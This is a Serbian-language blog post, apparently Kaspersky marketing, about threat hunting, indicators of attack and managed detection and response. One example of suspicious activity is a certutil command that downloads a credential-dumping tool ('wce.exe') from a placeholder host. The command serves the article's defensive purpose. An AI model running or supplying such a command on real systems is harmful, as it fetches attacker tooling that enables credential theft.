Šta je Tech Hosted by LANACO?

Tech Hosted by LANACO je najveća multivendorska konferencija u Bosni i Hercegovini koja se održava osmu godinu za redom i predstavlja mjesto okupljanja vodećih IT profesionalaca, vlasnika preduzeća, tehnoloških stručnjaka koji donose i predstavljaju savremene IT trendove i najbolje poslovne strategije koje pomažu organizacijama da ubrzaju i osnaže svoj put digitalnog poslovanja.

Koje teme će se obrađivati na konferenciji?

Na Tech Hosted konferenciju, pod novim sloganom: “Lead to inspire”, predstavnicima javnog i privatnog sektora iz cijele Bosne i Hercegovine novitete donose tehnološki stručnjaci iz cijelog svijeta.

Gdje se održava konferencija?

Konferencija se održava u LANACO Tehnološkom centru u Banjoj Luci, na adresi Veljka Mlađenovića bb.

Kako da učestvujem u nagradnoj igri?

Svi registrovani učesnici mogu prijavom na samoj konferenciji ostvariti učešće u nagradnoj igri.

Sistematski pristup zaštiti - Lov na predatore

Sistematski pristup zaštiti – Lov na predatore

07.03.2023. | Blog

Dok korporativni procesi prolaze kroz opsežnu automatizaciju, preduzeća postaju sve zavisnija od informacionih tehnologija. To, s druge strane, znači da se rizici povezani sa prekidom osnovnih poslovnih procesa konstantno prebacuju na IT polje. Programeri alata za automatizaciju su svesni toga i, u pokušaju da otklone moguće rizike, sve više ulažu u IT bezbednost – što je ključna karakteristika svakog IT sistema pored pouzdanosti, fleksibilnosti i troškova. U poslednjih nekoliko decenija došlo je do drastičnog poboljšanja bezbednosti softverskih proizvoda – praktično svi globalni proizvođači softvera sada objavljuju dokumenta posvećena bezbednosnim konfiguracijama i bezbednoj upotrebi njihovih proizvoda, dok je tržište informacione bezbednosti preplavljeno ponudama kako bi se osigurala zaštita u jednom ili drugom obliku.

Što više poslovanja kompanije zavisi od informacionih tehnologija, to je privlačnija ideja hakovanja njenih informacionih sistema. To opravdava svako dodatno ulaganje u resurse potrebne za izvršenje uspešnog napada suočenog sa povećanim nivoom IT bezbednosti.

Sistematski pristup zaštiti

Povećani nivoi bezbednosti softvera i tehnologija zaštite koje se konstantno razvijaju čine napade još izazovnijim. Dakle, sajber kriminalci, pošto su investirali u prodor u više slojeva odbrane, žele da provedu dosta vremena unutar ciljane infrastrukture, maksimalno povećavajući svoj profit čineći što veću štetu. Otuda i pojava ciljanih napada.

Ovi napadi su pažljivo isplanirani i sprovedeni – zajedno sa automatizovanim alatima, zahtevaju direktno i duboko angažovanje stručnih napadača kako bi prodrli u sisteme. Ovim stručnim napadačima mogu efikasno da se suprotstave samo profesionalci koji nisu ništa manje kvalifikovani i koji su opremljeni najsavremenijim alatima za otkrivanje i sprečavanje računarskih napada.

Sa stanovišta upravljanja rizicima, bezbednosni ciljevi jedne organizacije smatraju se ostvarenim kada napadačev trošak kompromitovanog sistema premašuje vrednost pribavljenih informacionih sredstava. I, kao što smo rekli, prodiranje u više bezbednosnih slojeva je skupo i izazovno. Međutim, postoji način da se dramatično smanje troškovi naprednog napada, dok gotovo sigurno ostaje neprimećen od strane bezbednosnih softvera. Jednostavno ubacujete kombinaciju široko poznatih legitimnih alata i tehnika u svoju naprednu napadačku oružarnicu.

Današnji operativni sistemi zapravo sadrže sve što je potrebno za napad na njih, bez potrebe da se pribegava zlonamernim alatima, što dramatično smanjuje troškove hakovanja. Ova „dvostruka funkcionalnost” alata koji se isporučuju uz OS je ono sa čime administratori sistema rade, tako da je veoma teško razlikovati legitimne aktivnosti od onih koje to nisu, a praktično ih je nemoguće prepoznati samo kroz automatizaciju. Jedini način da se suprotstavimo takvim pretnjama je usvajanje sistematskog pristupa zaštiti (Slika 1.). To podrazumeva brzo otkrivanje ukoliko je pretnju nemoguće sprečiti, a ukoliko je automatsko otkrivanje nemoguće, onda su potrebne preventivne prakse iz lova na pretnje i reagovanja na incidente kako bi se pretražili prikupljeni podaci i blagovremeno identifikovale i odgovorilo na pretnje koje uspešno izbegavaju automatska bezbednosna rešenja.

Skrivanje na vidnom mestu

U kompaniji Kaspersky, sa gotovo 100% samopouzdanja možemo reći da lista tehnologija za otkrivanje i prevenciju pretnji koje smo razvili tokom godina, uključujući najnovija istraživanja o masovnim podacima i mašinskom učenju, znači da naši bezbednosni proizvodi mogu da neutrališu svaki napad koji se može automatski otkriti i sprečiti. Međutim, automatsko otkrivanje i prevencija je samo početak. Više od 20 godina istraživanja i sprečavanja računarskih napada dalo nam je još moćnije sredstvo za hvatanje u koštac sa tim pošastima kada automatizacija jednostavno nije dovoljna – nejednaka ljudska ekspertiza.

Ciljani napadi uzimaju u obzir alate za zaštitu koji se nalaze na sistemima njihovih žrtava i razvijaju se u skladu sa tim, zaobilazeći sisteme automatskog otkrivanja i prevencije. Ovakve vrste napada često se izvode bez upotrebe bilo kakvog softvera, a postupci napadača jedva da se razlikuju od onih koje bi IT lice ili lice zaduženo za informacionu bezbednost inače obavljao.

Slede samo neke od tehnika koje se primenjuju u današnjim napadima:

• Upotreba alata za sputavanje digitalne forenzike, npr. bezbedno brisanje artifakata na hard disku ili napadi koji se obavljaju isključivo u memoriji računara

• Upotreba legitimnih alatki koje odeljenja za IT i informacionu bezbednost svakodnevno koriste

• Višestepeni napadi, kada se tragovi prethodnih faza bezbedno brišu

• Interaktivni rad stručnog tima (sličan onom koji se koristi tokom testiranja penetracije)

Takvi napadi mogu se identifikovati tek kada ciljno sredstvo bude ugroženo, jer se tek tada može otkriti sumnjivo ponašanje koje ukazuje na zlonamernu aktivnost. Ključni element ovde je angažovanje stručnog analitičara. Prisustvo čoveka u lancu analize događaja pomaže da se nadomeste slabosti svojstvene automatizovanoj logici otkrivanja pretnji. A kada napadi nalik testu penetracije uključuju aktivnog ljudskog napadača, taj čovek nesumnjivo ima prednost kada je u pitanju zaobilaženje automatizovanih tehnologija. Nasuprot njemu, prisustvo odgovarajućeg naoružanog ljudskog analitičara tada postaje jedini siguran način da se suprotstavimo napadu.

Nedostatak talenata iz IT bezbednosti

U međuvremenu, pronalaženje osoblja za IT bezbednost predstavlja sve veći izazov. Broj slobodnih pozicija na globalnom nivou iznosi 4,07 miliona, u odnosu na 2,93 miliona u isto vreme prošle godine. Sve veća potražnja za IT bezbednosnom ekspertizom takođe znači da je teško, ne samo pronaći kvalifikovane stručnjake, već i opravdati visoke troškove njihovog zapošljavanja. Dakle, ukoliko trenutno nemate potpunu dopunu u vidu bezbednosnih stručnjaka za lov na pretnje, istragu i reagovanje, ne treba računati na to da ćete napredovati. Potrebno je da pronađete drugi način.

Proizvodi i usluge koji za cilj imaju upravljanje otkrivanjem i reagovanjem (MDR) mogu biti efikasno rešenje za organizacije koje žele da uspostave i unaprede rano, efektivno otkrivanje pretnji i reagovanje, ali nemaju dovoljno internih stručnih IT bezbednosnih resursa (Slika 2). Spoljni saradnici koji vape za bezbednosnim zadacima, npr. lov na pretnje, iskusnom MDR provajderu odmah će isporučiti zrele IT bezbednosne funkcije bez potrebe da se dodatno ulaže u osoblje ili stručnost. Potpuno vođeni i individualno prilagođeni tekući troškovi otkrivanja, određivanje prioriteta, istrage i reagovanja mogu pomoći u sprečavanju otežanog poslovanja i smanjenju ukupnog uticaja incidenata, više od opravdavanja bilo kakvih povezanih troškova.

Igla u plastu sena

Kaspersky SOC neprestano prati više od 250 hiljada krajnjih tačaka širom sveta, a taj broj konstantno raste. Prikupljamo i obrađujemo ogromnu količinu telemetrije iz svakog od ovih senzora. I dok se većina pretnji automatski otkriva i sprečava, a samo mali broj njih odlazi na proveru kod ljudi, količina neobrađene telemetrije koja zahteva dodatnu reviziju je i dalje ogromna, a analiza svega toga ručno bila bi nemoguća kako bi se klijentima obezbedio lov na pretnje u vidu operativne usluge. Odgovor bi bio da SOC analitičari razmatraju te neobrađene događaje koji bi se mogli dovesti u vezu sa poznatim (ili čak samo teoretski mogućim) zlonamernim aktivnostima.

U našem SOC-u, ove vrste događaja nazivamo „lovom”, zvanično poznatim kao „Indikatori napada” ili IoA, jer pomažu u automatizaciji procesa lova na pretnje. Pravljenje IoA se smatra umetnošću, i kao i većina umetničkih formi ima tu nešto više od sistematskog performansa. Potrebno je postavljati pitanja i odgovarati na njih, poput „Koje tehnike je potrebno prioritetno otkriti, a koje mogu malo da sačekaju?” ili „Koje tehnike bi pravi napadač najverovatnije koristio?” Ovde se poznavanje protivničkih pristupa mnogo ceni.

Otkrivanje po osnovu IoA primenjuje se na aktivnost posle eksploatacije, gde alati koje koriste napadači nisu po prirodi zlonamerni, ali njihova zloupotreba jeste. Standardna, ali sumnjiva funkcionalnost se identifikuje u legitimnim uslužnim programima, gde klasifikovanje posmatranog ponašanja kao zlonamernog putem automatizacije ne bi bilo moguće.

IoA primeri:

• Pokretanje skripta komandne linije (ili bat/PowerShell) u pregledaču, kancelarijske ili serverske aplikacije (poput SQL servera, SQL agenta servera, nginx, JBoss, Tomcat i sl.);

• Sumnjiva upotreba certutil-a za preuzimanje datoteke (primer komande bi bio: certutil -verifyctl -f -split https[:]//primer.rs/wce.exe);

• Otpremanje datoteke pomoću BITS (Usluga inteligentnog prenosa u pozadini);

• whoami komanda koju izvršava SYSTEM nalog, kao i mnoge druge.

Kaspersky identifikuje skoro polovinu svih incidenata kroz analizu zlonamernih aktivnosti ili objekata otkrivenih pomoću IoA, demonstrirajući tako opštu efikasnost ovog pristupa u otkrivanju naprednih pretnji i sofisticiranih napada koji ne uključuju zlonamerne softvere. Međutim, što zlonamerno ponašanje više podseća na normalno ponašanje korisnika i administratora, to je veća potencijalna stopa pogrešnih tumačenja i, samim tim, manja je stopa uspešnosti uzbunjivanja. Dakle, ovo je nešto što treba rešiti.

Preskakanje reda

Iskusni napadači često koriste iste alate, sa istih radnih stanica, obraćajući se istim sistemima, u istim vremenskim intervalima kao što bi to uradio i pravi administrator sistema – bez anomalija, bez ikakvih naznaka da je u pitanju napadač – ništa. Suočen sa tim, samo ljudski analitičar može da donese konačnu odluku. On odlučuje da li je posmatrana aktivnost zlonamerna ili legitimna, ili čak postavljanje prostog pitanja da li je to zaista izvelo IT lice.

Međutim, SOC analitičari nemaju neograničene resurse. Kako je živi analitičar potreban da bi se proverio i odredio prioritet automatskog otkrivanja radi dalje istrage i reagovanja, veoma je važno da se što pre utvrdi da li je posmatrano ponašanje normalno za određenu IT infrastrukturu. Razumevanje osnovne linije koja nam govori da li je neka aktivnost normalna, pomaže nam u smanjenju broja pogrešnih upozorenja i povećava se efikasnost otkrivanja pretnji.

Visoke stope pogrešnih tumačenja i upozorenja koja zahtevaju proveru i istragu, mogu značajno, negativno da utiču na reagovanje na stvarne incidente. Ovde nastupa Mašinsko učenje (ML). ML modeli mogu se obučiti za upozorenja koja su prethodno proverena i ručno klasifikovana od strane SOC analitičara. Pružanjem upozorenja sa specifičnim bodovanjem ML modela moguće je kvalitetnije odrediti prioritet, filtriranje, čekanje u redu i tako dalje. ML model koji je napravio Kaspersky omogućava automatizaciju početne trijaže incidenata, te se time skraćuje vreme na reagovanje tako što se značajno povećava analitičarski protok.

Đavo se krije u detaljima

Upozorenja o zaštićenoj imovini zahtevaju korelaciju jer se napadači kasnije kreću od stanice do stanice. Važno je identifikovati sve pogođene stanice i steći potpunu sliku o preduzetim postupcima kako bi se definisala najefikasnija strategija za odgovor. U nekim slučajevima može biti potrebna dodatna istraga. Analitičari pribavljaju što širi kontekst kako bi utvrdili ozbiljnost incidenta. Ozbiljnost incidenta zasniva se na kombinaciji faktora, što uključuje aktera pretnje, u kojoj fazi se napad nalazi u trenutku otkrivanja incidenta (npr. sajber lanac ubijanja), broj i tipovi pogođenih sredstava, detalje o pretnji i koliko je relevantna za poslovanje klijenta, identifikaciju uticaja na infrastrukturu, složenost mera sanacije i još mnogo toga. Potrebno je da imate neprekidan pristup ažuriranim saznanjima o vašim napadačima, njihovoj motivaciji, njihovim metodama i alatima i potencijalnoj šteti koju bi mogli da nanesu kako biste razumeli šta se zapravo dešava. Generisanje ovih informacija zahteva stalnu posvećenost i visoke nivoe stručnosti.

Kaspersky SOC analizira primljene podatke koristeći sva naša saznanja o taktici, tehnikama i procedurama koje koriste protivnici širom sveta (Slika 3). Prikupljamo informacije iz stalnih istraživanja o pretnjama, baze znanja MITRE ATT&CK, desetina angažmana radi bezbednosnih procena godišnje koje se vrše po svim vertikalama, kao i neprestanog bezbednosnog praćenja i praksi reagovanja na incidente. Ovo znanje koje se stalno ažurira, obezbeđuje uspešno otkrivanje nevidljivih pretnji u kojima se ne koristi zlonamerni softver i pruža potpuni pregled situacije, omogućavajući nam da proverimo granične slučajeve i pružimo klijentima jasne i praktične smernice.

Povlačenje obarača

Kada se definiše strategija odgovora, vreme je da se preduzmu akcije. Obično se MDR usluge ovde završavaju. Klijenti dobijaju izveštaje o incidentima sa preporukama kako odgovoriti u datim situacijama – a na njima je da ih primene na svoje sisteme. Imajući u vidu da je nedostatak IT bezbednosne ekspertize možda razlog zašto se klijent opredelio za MDR, a činjenica je da takve preporuke mogu biti usko tehničke i ne uvek jasne i delotvorne, pravovremena i efikasna reakcija može biti ugrožena. Nedostatak centralizovanog automatizovanog reagovanja značajno doprinosi problemu, kompromitujući potencijalne prednosti stečene takvim angažmanima.

Kaspersky MDR se oslanja na vodeće bezbednosne tehnologije zasnovane na jedinstvenoj inteligenciji pretnji i naprednom mašinskom učenju. On automatski sprečava većinu pretnji prilikom provere svih upozorenja o proizvodu kako bi se obezbedila efikasnost automatske prevencije i preventivno analizira metapodatke aktivnosti sistema na sve znakove aktivnog ili predstojećeg napada. Naš MDR deli istog agenta sa Kaspersky Endpoint Security for Business i Kaspersky Endpoint Detection and Response (EDR) Optimum, obezbeđujući proširenu funkcionalnost kada se aktivira. Agent dozvoljava da zaraženi hostovi budu izolovani, neovlašćeni procesi da se prekinu, a zlonamerne datoteke da se smeste u karantin i izbrišu – sve to se radi daljinski, jednim klikom.

U zavisnosti od vaših zahteva, usluga može da ponudi potpuno upravljano ili vođeno ometanje i suzbijanje pretnji, dok sve odgovore na njih držite pod svojom punom kontrolom. Smernice za reagovanje u incidentima su delotvorne i isporučuju se na jednostavnom engleskom jeziku omogućavajući brzo i efikasno izvršenje. Kaspersky MDR klijenti mogu da koriste EDR Optimum funkcionalnost kako bi centralizovano sami pokrenuli preporučene odgovore ili ovlastili Kaspersky da automatski pokrene daljinski odgovor na incidente za određene vrste incidenata.

Zaključak

Ni automatizovano otkrivanje i sprečavanje pretnji, niti samo lov na sajber pretnje može biti bojeva municija za čitav spektar današnjih pretnji. Međutim, kombinacija tradicionalnih alatki za otkrivanje i prevenciju koje se aktiviraju pre nego što dođe do kompromitovanja, kao i post-kompromitovani proces traženja novih pretnji koje su propustili automatizovani alati, može biti veoma efikasna. Kaspersky Managed Detection and Response maksimalno uvećava vrednost bezbednosnih rešenja kompanije Kaspersky koje koristite obezbeđivanjem potpuno upravljanog, individualno prilagođenog otkrivanja, dodele prioriteta, istrage i odgovora.

Suprotstavljanje ciljanim napadima zahteva bogato iskustvo i neprekidno učenje. Kao prvi proizvođač koji je osnovao, pre skoro čitave decenije, namenski centar za istraživanje složenih pretnji, Kaspersky je otkrio više sofisticiranih ciljanih napada nego ijedan drugi pružalac usluga zaštite. Koristeći ovu jedinstvenu ekspertizu, možete da steknete veliku korist od toga da imate sopstveni Centar za bezbednosne operacije, a da zapravo ne morate da ga uspostavljate.

Cookie	Duration	Description
cookielawinfo-checkbox-analytics	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Analytics".
cookielawinfo-checkbox-functional	11 months	The cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Functional".
cookielawinfo-checkbox-necessary	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookies is used to store the user consent for the cookies in the category "Necessary".
cookielawinfo-checkbox-others	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Other.
cookielawinfo-checkbox-performance	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Performance".
viewed_cookie_policy	11 months	The cookie is set by the GDPR Cookie Consent plugin and is used to store whether or not user has consented to the use of cookies. It does not store any personal data.

Sistematski pristup zaštiti

Skrivanje na vidnom mestu

Nedostatak talenata iz IT bezbednosti

Igla u plastu sena

Preskakanje reda

Đavo se krije u detaljima

Povlačenje obarača

Zaključak

Sistematski pristup zaštiti – Lov na predatore

Odrastanje i roditeljstvo u digitalnom dobu

Zaštitite svoju djecu na internetu uz Kaspersky Safe Kids

Kaspersky ASAP: Automatizovana platforma za obuku zaposlenih o cyber sigurnosti

Lenovo SDI infrastruktura- Novi data centri sa stvarnim rezultatima

Naš tim vam stoji na raspolaganju za sva vaša pitanja.